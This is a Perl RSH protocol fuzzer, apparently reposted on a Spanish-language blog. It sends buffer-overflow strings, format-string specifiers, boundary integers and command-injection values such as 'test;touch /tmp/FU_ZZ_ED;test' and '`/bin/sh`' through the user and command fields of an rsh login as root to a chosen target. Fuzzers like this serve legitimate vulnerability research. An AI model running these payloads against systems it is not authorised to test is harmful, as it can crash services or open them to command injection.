RSH Fuzzer 


  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~
 
use Net::Rsh;
use Getopt::Std;
 
# FUZZ DATA BEGIN HERE
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);
 
@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);
 
@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');
 
@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE
 
getopts('t:', \%opts);
$target = $opts{'t'};
 
if(!defined($target))
{
     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
     print "\n Usage: $0 -t <target>\n\n";
     exit(0);
 
}
 
     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
 
     print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";
 
print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
 
print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
 
print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
 
     print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";
 
exit;
By pr0xxx0r - Publicado el 3/03/2020
Categoría:

0 comentarios: sobre RSH Fuzzer

Publicar un comentario para RSH Fuzzer

:a   :b   :c   :d   :e   :f   :g   :h   :i   :j   :k   :l   :m   :n   :o   :p   :q   :r   :s   :t

Suscribirse a: Enviar comentarios
Calculando Tiempo
Alienspace Theme © Copyright 2017 By Proxor
Mi Ping en TotalPing.com FeedBurner FeedBurner FeedBurner FeedBurner FeedBurner